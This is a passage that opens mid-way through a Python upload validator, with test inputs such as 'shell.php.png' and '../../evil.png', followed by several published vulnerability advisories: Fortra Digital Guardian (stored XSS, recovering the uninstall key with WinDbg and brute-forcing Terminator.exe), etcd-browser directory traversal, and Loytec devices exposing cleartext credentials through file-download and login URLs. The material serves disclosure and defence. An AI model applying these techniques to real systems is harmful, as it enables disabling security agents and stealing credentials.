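    if not EXTENSION_CHARS.fullmatch(extension):
        # Also catches spellings such as 'ph$p' that lax filters let through
        raise UploadRejected(f"extension contains disallowed characters: {extension!r}")
    if any(segment in EXECUTABLE_EXTENSIONS for segment in parts[1:]):
        raise UploadRejected("executable extension present in filename")
    if extension not in ALLOWED_TYPES:
        raise UploadRejected(f"extension not in allow-list: {extension!r}")
    if not any(content.startswith(magic) for magic in ALLOWED_TYPES[extension]):
        raise UploadRejected("content does not match the declared type")
    if b"<?php" in content or b"<?=" in content:
        # A valid image header followed by PHP (a polyglot) is still refused
        raise UploadRejected("PHP open tag found in upload body")
    # Random server-chosen name: the client never controls where or under what name the file lands
    return os.path.join(upload_dir, f"{secrets.token_hex(16)}.{extension}")


def upload_decision(filename: str, content: bytes) -> tuple:
    """Convenience wrapper returning ("accepted", path) or ("rejected", reason)."""
    try:
        return ("accepted", validate_upload(filename, content))
    except UploadRejected as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    for name, body in [("upgrade.php", SAMPLE_PHP), ("shell.php.png", SAMPLE_PNG),
                       ("x.ph$p", SAMPLE_PHP), ("photo.png", SAMPLE_PNG),
                       ("photo.png", SAMPLE_PNG + SAMPLE_PHP), ("../../evil.png", SAMPLE_PNG)]:
        print(f"{name:16} -> {upload_decision(name, body)}")
```

Pair the validator with a web-server rule that disables script execution in the upload directory (or serve uploads from a host that has no PHP at all); the validator stops the file from being stored as PHP, the server rule stops it from running even if validation is later bypassed.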
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231123-0 ><br />=======================================================================<br /> title: Uninstall Key Caching<br /> product: Fortra Digital Guardian Agent Uninstaller<br /> (Data Loss Prevention)<br /> vulnerable version: Agent: <7.9.4<br /> fixed version: Agent: 7.9.4<br /> CVE number: CVE-2023-6253<br /> impact: High<br /> homepage: https://www.fortra.com/product-lines/digital-guardian<br /> found: 2023-05-16<br /> by: J. Kruchem (Office Vienna)<br /> B. Gründling (Office Vienna)<br /> D. Hirschberger (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Digital Guardian is proud to be part of Fortra’s comprehensive cybersecurity<br />portfolio. Fortra simplifies today’s complex cybersecurity landscape by bringing<br />complementary products together to solve problems in innovative ways. These<br />integrated, scalable solutions address the fast-changing challenges you face in<br />safeguarding your organization. 
With the help of the powerful protection from<br />Digital Guardian and others, Fortra is your relentless ally, here for you every<br />step of the way throughout your cybersecurity journey."<br /><br />Source: https://www.digitalguardian.com/<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends that users of this platform install the latest update.<br /><br />Furthermore, an in-depth security analysis performed by security professionals is<br />highly advised, as the software may be affected by other security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Stored Cross-Site Scripting<br />The "PDF templates" feature is vulnerable to stored cross-site scripting<br />because it allows inserting arbitrary HTML. Therefore, an administrator can<br />create a malicious template which contains JavaScript and can send a link to<br />this template to authenticated users.<br /><br />According to the vendor, this feature works as intended and the associated risk<br />is low, hence it will not be fixed.<br /><br /><br />2) UninstallKey Cached in Memory / Installer File (CVE-2023-6253)<br />The Agent Uninstaller handles sensitive data insecurely and caches the Uninstall<br />key in memory. This key can be used to stop or uninstall the application.<br />This allows a locally authenticated attacker with administrative privileges<br />to disable the application temporarily or even remove the application from the<br />system completely.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Stored Cross-Site Scripting<br />According to the vendor, this feature works as intended and the associated risk<br />is low, hence it will not be fixed.<br /><br />When editing PDF templates in the Digital Guardian Management Console (DGMC),<br />JavaScript code can be injected. 
By clicking on "preview" the XSS code gets<br />triggered.<br /><br />The "PDF templates" feature can be found in the System -> Configuration menu.<br />Here, a new template can be uploaded, or an existing one can be edited. To<br />exploit the issue, malicious JavaScript can be added to a template:<br /><br />&lt;xss_insert.png&gt;<br /><br />Afterwards, the XSS is executed when the template is previewed with the<br />corresponding button:<br /><br />&lt;xss_trigger.png&gt;<br /><br />The attacker can also send the direct link to the template to the victim:<br />https://DG_HOST/DigitalGuardian/PopUps/PDFTemplatePreview.aspx?name=XSS.htm<br /><br />If a victim opens the link while authenticated, the JavaScript code will<br />be executed.<br /><br /><br />2) UninstallKey Cached in Memory / Installer File (CVE-2023-6253)<br />When executing the installer of the DG Agent (.msi), the uninstall key is<br />pre-configured and can be read out (e.g. via debugging).<br /><br />First, the LocalPackage registry hive was identified, which reveals the MSI<br />installation package located in the Windows directory:<br /><br />&lt;registry.png&gt;<br /><br />The file can be executed without local administrator privileges. When it is<br />executed and "Next" is clicked, the Uninstall Key is prefilled, as can be seen<br />in the following figure:<br /><br />&lt;installer.png&gt;<br /><br />Note: For demonstration purposes and simplification of the proof of concept, the<br />provided administrative access to the management console was used to append a<br />unique string to the uninstall key so it can be found in memory more<br />efficiently. An attacker can also find the key without this modification. For<br />this purpose, the string "sectest" was appended.<br /><br />WinDbg can be used to extract this key. WinDbg can simply be attached to the<br />process. Afterwards, the execution is paused in WinDbg and the following command<br />is used to search for the unique string:<br /> > s -u 0 L?FFFFFFFFFFFFFFFF "sectest"<br /><br />The following figure shows the output of this command (since a very large memory<br />space is searched, "Break" can be used to stop WinDbg from searching).<br /><br />&lt;windbg_1.png&gt;<br /><br />The memory space before "sectest" needs to be viewed to show the uninstall key.<br />The command db 000001c6`165b63a8 can be used to show the memory, as can be seen<br />in the following figure:<br /><br />&lt;windbg_2.png&gt;<br /><br />Thus, the original uninstall key is "dlpuninstall".<br /><br />Furthermore, it can be used with the Terminator.exe found in the following path:<br />"C:\Program Files\[...]\DLP"<br /><br />Running the application and supplying the key via an elevated command prompt<br />terminates all agent processes:<br /><br />&lt;terminator.png&gt;<br /><br />This binary can also be used to brute-force the correct Uninstall key, by<br />repeatedly calling it with possible Uninstall key candidates:<br />\.Terminator.exe &lt;key candidate&gt;<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested:<br />* Management Console: 8.5.0.0317<br />* Agent: 7.8.5.0048<br /><br />The vendor confirmed that all current and previous versions are affected.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-06-12: Contacting vendor through email (info@fortra.com);<br /> asking for security contact, no response.<br />2023-06-26: Contacting vendor through same email again, no response.<br />2023-07-28: Contacting vendor through a more direct email-channel, no response.<br />2023-09-14: Sent another email to various email addresses found on the<br /> website. 
Their "security.txt" file only points to inaccessible<br /> pages (403 Access denied or 404 for the PGP key).<br />2023-09-14: Vendor response (Fortra support contact): forwarded our email to<br /> Digital Guardian support team.<br /> Support team and product security team reply.<br />2023-09-15: Asked for email encryption, received PGP key.<br />2023-09-18: Sending encrypted security advisory.<br />2023-09-19: Confirmation of receipt, team is working on verification and<br /> development.<br />2023-10-11: Asking for status update.<br /> Vendor response: XSS could be replicated but functionality works<br /> as intended and won't be fixed because of limited exposure.<br /> Issue 2 could not be verified yet, but engineering has acknowledged<br /> it as addressable. Fix is planned for Q4. All current and previous<br /> versions are affected.<br />2023-10-12: Asking for CVE number and if further input regarding vulnerability 2<br /> is needed, no response.<br />2023-10-17: Received ticket notification that next maintenance update version<br /> 7.9.4 should be available for customer testing in the near future.<br />2023-11-09: Received ticket notification that version 7.9.4 is now GA for all<br /> customers.<br />2023-11-13: Sending advisory draft to vendor, asking for CVE number for issue 2<br /> again, scheduling advisory release for next week.<br />2023-11-17: Vendor response, no CVE number yet, we will request one ourselves.<br />2023-11-23: Public release of security advisory.<br /><br /><br /><br />Solution:<br />---------<br />The vendor provides an updated Agent version 7.9.4 which can be downloaded<br />at the vendor's support page:<br />https://www.digitalguardian.com/services/support<br /><br />Access controls to the management console along with monitoring and preventive<br />controls are recommended compensating controls for issue 1 according to the vendor.<br /><br /><br />Workaround:<br />-----------<br />To prevent disclosure of the uninstall key (issue 
2) change it immediately after<br />deploying the DG agent on the system.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult? Send us your application<br />https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF J. Kruchem, B. Gründling, D. Hirschberger / @2023<br /></code></pre>
<pre><code>An issue was discovered in server.js in etcd-browser 87ae63d75260. By<br />supplying a /../../../ Directory Traversal input to the URL's GET<br />request while connecting to the remote server port specified during<br />setup, an attacker can retrieve local operating system files from the<br />remote system.<br /><br />------------------------------------------<br /><br />[Vulnerability Type]<br />Directory Traversal<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />https://hub.docker.com/r/buddho/etcd-browser<br /><br />------------------------------------------<br /><br />[Affected Product Code Base]<br />etcd-browser - Unknown<br /><br />------------------------------------------<br /><br />[Affected Component]<br />the server.js file does not validate the path for files.<br /><br />------------------------------------------<br /><br />[Attack Type]<br />Remote<br /><br />------------------------------------------<br /><br />[Impact Information Disclosure]<br />true<br /><br />------------------------------------------<br /><br />[CVE Impact Other]<br />Allow for a remote arbitrary user to obtain local operating system files<br /><br />------------------------------------------<br /><br />[Attack Vectors]<br />The attacker must supply a /../../ technique to the server application<br />running on the remote port specified during setup<br /><br />------------------------------------------<br /><br />[Reference]<br />https://hub.docker.com/r/buddho/etcd-browser<br />https://hub.docker.com/r/buddho/etcd-browser/tags<br /><br />------------------------------------------<br /><br />[Discoverer]<br />Kevin Randall<br /><br /></code></pre>
<pre><code><br />[+] CVE : CVE-2023-46386, CVE-2023-46387, CVE-2023-46388, CVE-2023-46389<br />[+] Title : Multiple vulnerabilities in Loytec L-INX Automation Servers<br />[+] Vendor : LOYTEC electronics GmbH<br />[+] Affected Product(s) : LINX-151, Firmware 7.2.4, LINX-212, firmware 6.2.4<br />[+] Affected Components : L-INX Automation Servers<br />[+] Discovery Date : 01-Sep-2021<br />[+] Publication date : 03-Nov-2023<br />[+] Discovered by : Chizuru Toyama of TXOne networks<br /><br /><br />[Vulnerability Description]<br /><br />CVE-2023-46386 : Insecure Permissions<br />The 'registry.xml' file contains hard-coded cleartext credentials for the<br />SMTP client account. If an attacker succeeds in obtaining the registry.xml file,<br />the email account could be compromised. The password should be encrypted.<br /><br />CVE-2023-46387 : Improper Access Control<br />The '/var/lib/lgtw/dpal_config.zml' file is accessible via the file download API.<br />'dpal_config.wbx', which is extracted from 'dpal_config.zml', includes<br />sensitive configuration information such as SMTP client settings.<br />Authentication is required to exploit this vulnerability.<br />http://&lt;IP&gt;:&lt;port&gt;/DT?filename=/var/lib/lgtw/dpal_config.zml<br /><br />CVE-2023-46388 : Insecure Permissions<br />The 'dpal_config.wbx' file contains hard-coded cleartext credentials for the<br />SMTP client account. If an attacker succeeds in obtaining the dpal_config.zml file,<br />the email account could be compromised. The password should be encrypted.<br /><br />CVE-2023-46389 : Improper Access Control<br />The '/tmp/registry.xml' file is accessible via the file download API.<br />'registry.xml' includes device configuration information, including<br />sensitive information such as SMTP client settings. Authentication is<br />required to exploit this vulnerability.<br />http://&lt;IP&gt;:&lt;port&gt;/DT?filename=/tmp/registry.xml<br /><br /><br />[Timeline]<br /><br />01-Sep-2021 : Vulnerabilities discovered<br />13-Oct-2021 : Trend Micro ZDI (Zero Day Initiative) reported to vendor (no response)<br />07-Oct-2022 : ICS CERT reported to vendor (no response)<br />03-Nov-2023 : Public Disclosure<br /><br /><br /><br /></code></pre>
<pre><code><br />[+] CVE : CVE-2023-46383, CVE-2023-46384, CVE-2023-46385<br />[+] Title : Multiple vulnerabilities in Loytec LINX Configurator<br />[+] Vendor : LOYTEC electronics GmbH<br />[+] Affected Product(s) : LINX Configurator 7.4.10<br />[+] Affected Components : LINX Configurator<br />[+] Discovery Date : 01-Sep-2021<br />[+] Publication date : 03-Nov-2023<br />[+] Discovered by : Chizuru Toyama of TXOne networks<br /><br /><br />[Vulnerability Description]<br /><br /> CVE-2023-46383 : Insecure Permissions<br /> Loytec LINX Configurator can connect to Loytec devices with an<br /> administrator credential and configure device settings. Because it<br /> uses HTTP Basic Authentication, which transmits usernames and passwords<br /> as base64-encoded cleartext, anyone who can sniff the network traffic<br /> can easily steal the credentials. Once the admin password is obtained,<br /> attackers could connect to and control Loytec devices via LINX Configurator.<br /> <br /> CVE-2023-46384 : Insecure Permissions<br /> The following registry key contains the hard-coded cleartext admin password<br /> of the recently connected Loytec device (a password cache). If an attacker<br /> succeeds in reading this registry value, they could connect to and control<br /> Loytec devices via LINX Configurator.<br /><br /> Key: Computer\HKEY_CURRENT_USER\SOFTWARE\LOYTEC\LOYTEC LINX Configurator\OhioIni<br /> Value name: ftp_pass<br /> Value data: &lt;admin password&gt;<br /><br /> CVE-2023-46385 : Insecure Permissions<br /> When Loytec LINX Configurator connects to a device, it sends an HTTP GET<br /> request to log in. Because the cleartext password is passed as the URL<br /> parameter "password" without sufficient protection, anyone who can sniff<br /> the network traffic can easily steal the credentials. Once the admin<br /> password is obtained, attackers could connect to and control Loytec devices<br /> via LINX Configurator.<br /> http://&lt;IP&gt;:&lt;port&gt;/webui/config/system?username=admin&password=&lt;admin password&gt;&login=Login<br /><br /><br />[Timeline]<br /><br /> 01-Sep-2021 : Vulnerabilities discovered<br /> 13-Oct-2021 : Trend Micro ZDI (Zero Day Initiative) reported to vendor (no response)<br /> 07-Oct-2022 : ICS CERT reported to vendor (no response)<br /> 03-Nov-2023 : Public Disclosure<br /><br /><br /></code></pre>